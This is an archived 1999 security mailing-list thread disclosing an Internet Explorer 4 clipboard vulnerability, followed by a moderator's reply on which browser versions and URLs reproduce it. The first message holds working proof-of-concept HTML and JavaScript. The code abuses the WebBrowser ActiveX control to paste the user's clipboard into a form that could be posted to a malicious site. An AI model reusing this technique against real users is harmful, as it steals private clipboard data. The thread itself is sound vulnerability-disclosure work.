ie4.clipboard.txt

`Date: Mon, 22 Feb 1999 23:39:07 +0100  
From: Juan Carlos Garcia Cuartango <[email protected]>  
To: [email protected]  
Subject: New IE4 vulnerability : the clipboard again.  
  
Greetings,   
  
I have discovered another IE 4 clipboard vulnerability. The clipboard   
content can be made public by a very simple javascript code.  
  
I reported the problem to Microsoft on Feb 10. They confirmed the   
problem. It seems that they were already aware of the problem and It   
will be fixed in the next IE 4 service pack.  
  
The problem is located in the Internet WebBrowser ActiveX object.  
  
Regards,  
Juan Carlos  
  
More info and a demo is available at :  
http://pages.whowhere.com/computers/cuartangojc  
  
Regards,  
  
Juan Carlos  
  
  
The Clipboard vulnerability demo  
http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html  
  
----------  
<body onload="wb.navigate('http://pages.whowhere.com/computers/cuartangojc/blank.html')">  
<script>  
  
function pt()  
{  
  
if (document.forms(0).S1.value == "" )  
{  
wb.focus();  
wb.Document.execCommand("paste");   
document.forms(0).S1.value = wb.Document.body.innerText;  
}  
}  
function StartJob()  
{  
document.forms(0).S1.value = "";  
wb.focus();  
wb.Document.execCommand("paste");   
window.setTimeout("pt()",1000);  
}  
</script>  
  
According with Microsoft security rules access to Windows clipboard content   
is forbidden to Internet Explorer scripts unless the clipboard content was   
owned by the Explorer itself. If an script performs a paste operation over   
an input text box the operation will succeed only if data were copied to   
the clipboard from the Internet Explorer.   
  
There is a way to circumvent this protection by using a Microsoft Web Browser   
ActiveX control this object can perform a paste operation without security   
restrictions. The clipboard data can then be transferred to a form input box   
and posted to a malicious WEB.  
  
The box below is a Input Text Area Box your clipboard text data must be here,   
if not then do a copy (from any application) and then reload this page.  
  
<form method="POST" action="--WEBBOT-SELF--">  
<!--webbot bot="SaveResults" startspan U-File="_private/form_results.txt"  
S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><!--webbot bot="SaveResults" endspan --><p><textarea  
  
rows="3" name="S1" cols="82"></textarea></p>  
</form>  
  
The box below is a Microsoft Web Browser ActiveX control.  
  
<object classid="clsid:8856F961-340A-11D0-A96B-00C04FD705A2" width="530" height="150"  
id="wb">  
</object>  
  
---------------------------------------------------------------------------  
  
Date: Wed, 24 Feb 1999 11:21:03 -0500  
From: Russ <[email protected]>  
To: [email protected]  
Subject: Re: New IE4 vulnerability : the clipboard again.  
  
Marc Berajano said...  
  
>i, like mnemonix, got the access denied error when IE used the  
>http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html URL, but  
>i don't get that error using the  
>http://pages.whowhere.com/computers/cuartangojc/cb.html URL as your  
>web page says. however, even when i do use the correct URL, my  
>clipboard contents are not shown. i'm using the public beta 2 of IE 5  
>(5.00.0910.1309) on NT4 SP4.  
  
and I would add that my clipboard contents DO SHOW using;  
  
NT 4.0 SP1  
IE 4.0 version 4.72.3110.8 128-bit SP1, 2735, 2922;  
  
So it seems that the URL makes a big difference to demonstrating Juan  
Carlos' vulnerability.  
  
Use http://pages.whowhere.com/computers/cuartangojc/cb.html to test  
yourself.  
  
Cheers,  
Russ - NTBugtraq moderator  
  
`